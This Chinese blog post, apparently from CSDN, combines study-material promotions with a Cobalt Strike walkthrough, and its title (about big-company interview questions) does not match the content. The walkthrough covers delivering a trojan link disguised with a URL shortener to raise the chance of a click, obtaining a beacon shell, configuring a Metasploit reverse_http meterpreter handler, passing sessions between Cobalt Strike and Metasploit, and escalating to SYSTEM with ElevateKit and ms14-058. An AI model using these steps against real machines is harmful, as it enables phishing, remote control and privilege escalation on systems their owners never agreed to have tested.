2024年Cobalt Strike渗透神器详解(1),2024年最新腾讯字节等大厂面试真题汇总

于 2024-05-05 04:03:13 发布
阅读量1k 收藏 11
点赞数 20
分类专栏: 程序员 文章标签: 面试 职场和发展
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84264491/article/details/138457109
版权

一、网安学习成长路线图

网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
在这里插入图片描述

二、网安视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
在这里插入图片描述

三、精品网安学习书籍

当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
在这里插入图片描述

四、网络安全源码合集+工具包

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
在这里插入图片描述

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

在这里插入图片描述
在这里插入图片描述

  • 复制生成的链接;(注:小提一嘴,一般情况下直接发送链接很容易被识破,我们可以使用短链接生成器生成一个短链接,接着配合一些图片或页面,这样可以大大提高命中率,由于只是测试这里就不演示了哟,也是提供一个思路或方法

在这里插入图片描述

  • 将该恶意链接发送至目标靶机,当靶机用户访问时即会下载该木马文件;(注:需要关闭防火墙,杀毒软件等)

在这里插入图片描述

成功拿到shell
  • 假设靶机用户比较好奇,无意中点击执行了该恶意文件,返回到CS中可以看到目标已成功上线;

在这里插入图片描述

  • 拿到shell该怎么执行命令呢?别急别急,这就来了;

在这里插入图片描述

#查看IP信息
shell ipconfig
#查看用户
net user

在这里插入图片描述

  • 执行desktop命令,还可看到靶机用户桌面实时情况;

在这里插入图片描述

CS如何联动MSF

所需环境

攻击机(kali)
目标靶机(win 10)

前提条件
  • 必须确保目标靶机已成功上线,这里就不一一演示了哟;

在这里插入图片描述

MSF配置监听模块
  • kali打开msfconsole;

在这里插入图片描述

  • 设置模块,配置payload信息并执行攻击;
#使用监听模块
use exploit/multi/handler
#配置payload
set payload windows/meterpreter/reverse_http
#配置IP和端口
set lhost kali-ip
set lport 端口
#开始攻击
run/exploit

在这里插入图片描述

CS新建监听器
  • 在CS中新建一个监听器;

在这里插入图片描述

  • 配置一下基础的信息,值得注意的是IP和端口必须和msf监听的一致;

在这里插入图片描述

成功交互
  • 右击后点击Interact进入命令模式;

在这里插入图片描述

  • 接着点击Spawn添加,选择刚配置的监听payload;

在这里插入图片描述
在这里插入图片描述

  • 等待命令执行完即可;

在这里插入图片描述

  • 返回msf发现监听成功,成功进行交互;

在这里插入图片描述

CS如何进行提权操作

所需环境

攻击机(kali)
目标靶机(win 2008 R2)

前提条件
  • 还是必须确保目标靶机已成功上线哟;

在这里插入图片描述

查看用户权限
  • 打开视图命令,发现上线用户为普通用户;

在这里插入图片描述

  • 打开命令模式,执行getuid命令获取用户ID,有点慢稍等一会儿;

在这里插入图片描述

下载提权插件
  • CS里面含有自动化的提权,来到提权模块;

在这里插入图片描述

  • 默认提权的exp就只要下面这两个,肯定是不够的,所以得去加载一些提权的插件;

在这里插入图片描述

  • 下载ElevateKit提权插件;

在这里插入图片描述

  • 由于CS是在kali上,将该插件上传至kali以进行操作;

在这里插入图片描述

加载插件
  • 接下来加载插件,选择脚本管理模块;

在这里插入图片描述

  • 选择上传的插件,点击打开;

在这里插入图片描述

  • 打印出插件路径说明上传成功了;

在这里插入图片描述

  • 再次打开提权模块,发现EXP果然更多了;

在这里插入图片描述
在这里插入图片描述

成功提权
  • 选择好监听的目标和ms14-058EXP后,开始提权;(注:不同的靶机需要用到的提权exp是不一样的,这里的靶机环境为win 2008 R2)
  • 过程也是会比较慢的,等待一会后成功提权至system权限;

在这里插入图片描述

  • 进入命令模式,执行getuid命令查看当前用户成功提升至system权限;

在这里插入图片描述
还有一些其他的提权插件也还不错的,有兴趣可以下载试试;

https://github.com/DeEpinGh0st/Erebus

以上内容就是Cobalt Strike渗透神器的详细使用过程,当然还有很多其他的用法,后续也会慢慢更新喔,如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵一下,我也会慢慢去改进和提高的,请各位小伙伴多多支持,走之前别忘了点个赞哟😁!

CS小福利

关注微信公众号Joker零安全回复CS另附上工具精美礼品一份哟~

免责声明由于传播、利用本博客或微信公众号所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,Joker零安全及博客作者不为此承担任何责任,一旦造成后果请自行承担!

学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84264491
关注
  • 20
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CobaltStrike4.4.zip
09-15
CobaltStrike4.4
Cobalt Strike4.7最新
11-03
windows及Linux都可兼容的版本,Cobalt Strike是一由美国安全团队研发的渗透测试工具,拥有多种协议等多种功能。Cobalt Strike还可以调用Mimikatz、Ladon等其他知名工具,因此广受技术安全渗透人员的喜爱。它分为客户端和服务端,服务端只有一个,大家可以共同操作shell
Cobalt-Strike-4.7
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动。 Cobalt Strike 分为客户端组件和服务组件。 服务组件,也就是团队服务,是 Beacon payload 的 控制,也是 Cobalt Strike 社会工程功能的托管主机。团队服务还存储由 Cobalt Strike 收集的数据,并管理日志记录。 客户端组件:客户端团队成员使用的图形化界面
CobaltStrike4.0渗透测试手册
03-18
CobaltStrike4.0渗透测试手册
CobaltStrike4.7
11-29
cobalt strike(简称CS)是一款团队作战渗透测试,分为客户端及服务端,一个服务端可以对应多个客户端,一个客户端可以连接多个服务端。 Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览的相关信息等。
渗透测试工具-Cobalt Strike
最新发布
03-21
渗透测试学习工具,Cobalt Strike简称CS
Cobalt-Strike基本使用
热门推荐
m0_52233414的博客
01-31 1万+
Cobalt Strike(简称为CS)是一款基于java的渗透测试工具(尤其是后渗透阶段),自3.0开始已经不再使用Metasploit框架而作为一个独立的平台使用,这款工具有其他很多渗透测试工具没有的团队合作功能,团队成员可以连接到同一个服务上进行合作,共享攻击资源。
CobaltStrike使用教程详解(基础)
逍遥小哥的博客
07-14 1万+
大家好,今天简单来聊聊CobaltStrike,这是我们后渗透阶段必不可少的Cobalt Strike 是一款流行的渗透测试工具,广泛用于红队操作和渗透测试。它由Raphael Mudge创立的Strategic Cyber LLC开发,并于2012年首次发布。Cobalt Strike 提供了一套功能强大的工具和框架,用于模拟网络攻击、横向移动、特权升级、持久化访问以及命令和控制等任务。它旨在帮助安全专业人员评估和改善组织的网络防御能力,同时提供了完整的红队操作平台。
黑客必备利:如何在系统上安装和使用 CobaltStrike(简称:CS)
weixin_43263566的博客
01-11 1万+
渗透测试之基本的攻击流程
Cobalt Strike(学习笔记)
那年烟花终亦冷
06-07 2764
Cobalt Strike简介 Cobalt Strike 是一款GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览自动攻击等。 Cobalt Strike: C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透。 注:鉴于作为新人面试会用到这些基础知识,所以把简介也抄过来了。 安装Cobal
团队协同作战渗透工具 CSCobalt Strike
有勇气的牛排博客
02-14 1万+
Cobalt Strike是一款渗透测试工具,常被称为CS,从3.0开始不在使用Metaspoit的漏洞库,称为一个独立平台,它分为 客户端(可以是多个)和 服务端(一个)
Cobalt Strike渗透详解
读书 买花 长大
06-27 2138
cobalt strike
[渗透工具——Cobalt Strike]
个人学习参考
03-11 1069
本篇文章仅作为本人学习笔记,如有问请各位大佬指正!选项作用新建连接设置视图(枢纽试图、会话列表、目标列表 )VPN接口Listeners监听脚本管理Close关闭。
CobaltStrike基础使用详解
weixin_53747497的博客
04-17 3273
Cobalt Strike(简称为CS)是一款团队作战渗透测试,是一种可以用来进行横 向移动、数据窃取、鱼叉式钓鱼的后渗透工具,分为客户端和服务端,一个客户端可 以连接多个服务端,一个服务端也可以对应多个客户端连接。Connect to team server:连接服务端Disonnect from team server:断开当前服务端连接Configure Listeners:配置监听Show sessions in graph view:展示会话列表。
Cobalt Strike 使用指南(资源整合笔记)
天在等我,菜鸟想飞
12-30 6983
0x00 写在前面的话 Cobalt Strike自出世以来,一直在红队常用的工具行列。因其优良的团队协作性,被冠以多人运动的必备利。 本文将网络上各路仙的经验分享以渗透流程为依据进行了一次整合,旨在提供工具的学习使用流程。 1、工具介绍 CS是什么? Cobalt Strike是一款渗透测试,常被业界人称为CSCobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。 Cobalt Strike集成
全网最全的Cobalt Strike使用教程-进阶篇
喜欢Python编程的程序员柚柚呀
08-17 4853
在这篇文章中,斗哥将详细介绍一下Cobalt Strike的各个模块是干什么的以及部分模块的具体使用方式。
cobalt strike
weixin_43873557的博客
02-08 1万+
cobalt strike(简称CS)是一款团队作战渗透测试,分为客户端及服务端,一个服务端可以对应多个客户端,一个客户端可以连接多个服务端。 Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览的相关信息等。 metasploit是一款开源框架,armitage是metasploit框架的图形化界面方式,cobalt strike是armitage
渗透工具——cs(Cobalt Strike)简介
2301_78006725的博客
09-09 2905
CS 是Cobalt Strike的简称,是一款渗透测试,常被业界人称为CSCobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。3、Cobalt Strike可以引用其他的通讯框架ExternalC2,ExternalC2是由Cobalt Strike提出的一套规范/框架,它允许黑客根据需要对框架提供的默认HTTP(S)/DNS/SMB C2 通信通道进行扩展。Desktop(VNC) #桌面交互。
渗透测试框架——Cobalt Strike
Liu_Bruce的博客
12-14 1191
Cobalt Strike是一款非常成熟的渗透测试框架。Cobalt Strike在3.0版本之前是基于Metasploit框架工作的,可以使用Metasploit的漏洞库。从3.0版本开始,Cobalt Strike不再使用Metasploit的漏洞库,成为一个独立的渗透测试平台。Cobalt Strike是用Java语言编写的。可以进行团队协作,以搭建了Cobalt Strike的TeamServer服务的服务为中转站,使目标系统权限反弹到该TeamServer服务上。同时,Cobalt Strik
CobaltStrike渗透框架
09-01
CobaltStrike提供了广泛的功能,包括命令和控制服务、漏洞利用、社会工程学攻击、横向移动、提权和数据渗透等。它还支持团队合作,可以在渗透测试中进行团队协作和信息共享。CobaltStrike已经成为许多红队和渗透...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值